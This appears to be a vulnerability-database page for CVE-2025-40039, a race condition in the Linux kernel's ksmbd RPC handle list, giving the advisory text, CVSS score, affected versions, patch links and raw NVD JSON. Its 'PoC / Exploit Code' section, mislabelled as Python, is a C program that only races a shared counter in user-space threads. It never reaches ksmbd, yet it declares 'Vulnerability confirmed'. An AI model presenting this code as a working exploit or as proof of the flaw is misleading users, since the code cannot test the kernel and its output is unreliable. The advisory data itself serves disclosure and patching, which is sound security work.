CVE-2025-40039

Description

In the Linux kernel, the following vulnerability has been resolved: ksmbd: Fix race condition in RPC handle list access The 'sess->rpc_handle_list' XArray manages RPC handles within a ksmbd session. Access to this list is intended to be protected by 'sess->rpc_lock' (an rw_semaphore). However, the locking implementation was flawed, leading to potential race conditions. In ksmbd_session_rpc_open(), the code incorrectly acquired only a read lock before calling xa_store() and xa_erase(). Since these operations modify the XArray structure, a write lock is required to ensure exclusive access and prevent data corruption from concurrent modifications. Furthermore, ksmbd_session_rpc_method() accessed the list using xa_load() without holding any lock at all. This could lead to reading inconsistent data or a potential use-after-free if an entry is concurrently removed and the pointer is dereferenced. Fix these issues by: 1. Using down_write() and up_write() in ksmbd_session_rpc_open() to ensure exclusive access during XArray modification, and ensuring the lock is correctly released on error paths. 2. Adding down_read() and up_read() in ksmbd_session_rpc_method() to safely protect the lookup.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel ksmbd (受影响版本需查看具体内核版本补丁)

相关内核版本包括: 305853cce379407090a73b38c5de5ba748893aee

相关内核版本包括: 5cc679ba0f4505936124cd4179ba66bb0a4bd9f3

相关内核版本包括: 69674b029002b1d90b655f014bdf64f404efa54d

相关内核版本包括: 6b615a8fb3af0baf8126cde3d4fee97d57222ffc

相关内核版本包括: 6bd7e0e55dcea2cf0d391bbc21c2eb069b4be3e1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-40039 PoC - Race Condition in ksmbd RPC Handle List
// This PoC demonstrates the race condition by spawning multiple threads
// that concurrently call RPC operations to trigger the race condition

#include <stdio.h>
#include <pthread.h>
#include <unistd.h>
#include <stdlib.h>

// Simulated ksmbd structures
typedef struct {
    void *rpc_handle_list;  // XArray structure
    void *rpc_lock;         // rw_semaphore
} ksmbd_session_t;

ksmbd_session_t global_session;
volatile int shared_counter = 0;
volatile int race_triggered = 0;

// Simulated vulnerable function: ksmbd_session_rpc_open
void* ksmbd_session_rpc_open(void* arg) {
    int thread_id = *(int*)arg;
    
    // VULNERABLE: Using read lock for write operation (xa_store/xa_erase)
    // Should use write lock (down_write) for modifying XArray
    // down_read(&session->rpc_lock);  // Incorrect lock type
    
    for (int i = 0; i < 1000; i++) {
        // Simulate xa_store() operation
        shared_counter++;
        
        // Simulate xa_erase() operation
        shared_counter--;
        
        // Check for race condition indicators
        if (shared_counter != 0) {
            race_triggered = 1;
            printf("[Thread %d] Race condition detected! counter=%d\n", 
                   thread_id, shared_counter);
        }
    }
    
    // up_read(&session->rpc_lock);
    return NULL;
}

// Simulated vulnerable function: ksmbd_session_rpc_method
void* ksmbd_session_rpc_method(void* arg) {
    int thread_id = *(int*)arg;
    
    // VULNERABLE: No lock at all when accessing XArray with xa_load()
    // Should use read lock (down_read) for read-only access
    
    for (int i = 0; i < 1000; i++) {
        // Simulate xa_load() without lock
        int temp = shared_counter;
        
        // Simulate use-after-free scenario
        if (temp < 0) {
            printf("[Thread %d] Potential use-after-free detected!\n", thread_id);
        }
    }
    
    return NULL;
}

int main() {
    pthread_t threads[8];
    int thread_ids[8];
    
    printf("CVE-2025-40039 PoC - ksmbd RPC Handle Race Condition\n");
    printf("=====================================================\n\n");
    
    // Create threads to trigger race condition
    for (int i = 0; i < 4; i++) {
        thread_ids[i] = i;
        pthread_create(&threads[i], NULL, ksmbd_session_rpc_open, &thread_ids[i]);
    }
    
    for (int i = 4; i < 8; i++) {
        thread_ids[i] = i;
        pthread_create(&threads[i], NULL, ksmbd_session_rpc_method, &thread_ids[i]);
    }
    
    // Wait for all threads
    for (int i = 0; i < 8; i++) {
        pthread_join(threads[i], NULL);
    }
    
    printf("\nFinal counter value: %d\n", shared_counter);
    printf("Race condition triggered: %s\n", race_triggered ? "YES" : "NO");
    
    if (race_triggered) {
        printf("\n[!] Vulnerability confirmed: Race condition in ksmbd RPC handle access\n");
        return 1;
    }
    
    return 0;
}

// Compilation: gcc -pthread -o cve_poc cve_poc.c
// Note: This is a simplified PoC for demonstration purposes.
// Real exploitation requires triggering ksmbd's SMB/RPC processing paths.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-40039
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-40039
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-40039/
[4] VulDB https://vuldb.com/cve/CVE-2025-40039
[5] https://git.kernel.org/stable/c/305853cce379407090a73b38c5de5ba748893aee
[6] https://git.kernel.org/stable/c/5cc679ba0f4505936124cd4179ba66bb0a4bd9f3
[7] https://git.kernel.org/stable/c/69674b029002b1d90b655f014bdf64f404efa54d
[8] https://git.kernel.org/stable/c/6b615a8fb3af0baf8126cde3d4fee97d57222ffc
[9] https://git.kernel.org/stable/c/6bd7e0e55dcea2cf0d391bbc21c2eb069b4be3e1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-40039", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-28T12:15:37.847", "lastModified": "2026-02-26T15:50:57.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: Fix race condition in RPC handle list access\n\nThe 'sess->rpc_handle_list' XArray manages RPC handles within a ksmbd\nsession. Access to this list is intended to be protected by\n'sess->rpc_lock' (an rw_semaphore). However, the locking implementation was\nflawed, leading to potential race conditions.\n\nIn ksmbd_session_rpc_open(), the code incorrectly acquired only a read lock\nbefore calling xa_store() and xa_erase(). Since these operations modify\nthe XArray structure, a write lock is required to ensure exclusive access\nand prevent data corruption from concurrent modifications.\n\nFurthermore, ksmbd_session_rpc_method() accessed the list using xa_load()\nwithout holding any lock at all. This could lead to reading inconsistent\ndata or a potential use-after-free if an entry is concurrently removed and\nthe pointer is dereferenced.\n\nFix these issues by:\n1. Using down_write() and up_write() in ksmbd_session_rpc_open()\n to ensure exclusive access during XArray modification, and ensuring\n the lock is correctly released on error paths.\n2. Adding down_read() and up_read() in ksmbd_session_rpc_method()\n to safely protect the lookup."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.145", "versionEndExcluding": "5.16", "matchCriteriaId": "B98C9201-BF17-4E2C-84FF-75EE2AA94DC5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.71", "versionEndExcluding": "6.2", "matchCriteriaId": "163E72B5-0F5D-49E2-AAEA-F11E02D730AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.6.123", "matchCriteriaId": "F522E23F-2E27-4FDC-A9A5-FE6B600E1D7D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.53", "matchCriteriaId": "A9028AC3-C3E8-4D5D-9235-DE8859551F7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.17.3", "matchCriteriaId": "F55A160F-1578-4C10-ABCB-F90B7E146ED8"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/305853cce379407090a73b38c5de5ba748893aee", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5cc679ba0f4505936124cd4179ba66bb0a4bd9f3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/69674b029002b1d90b655f014bdf64f404efa54d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6b615a8fb3af0baf8126cde3d4fee97d57222ffc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6bd7e0e55dcea2cf0d391bbc21c2eb069b4be3e1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}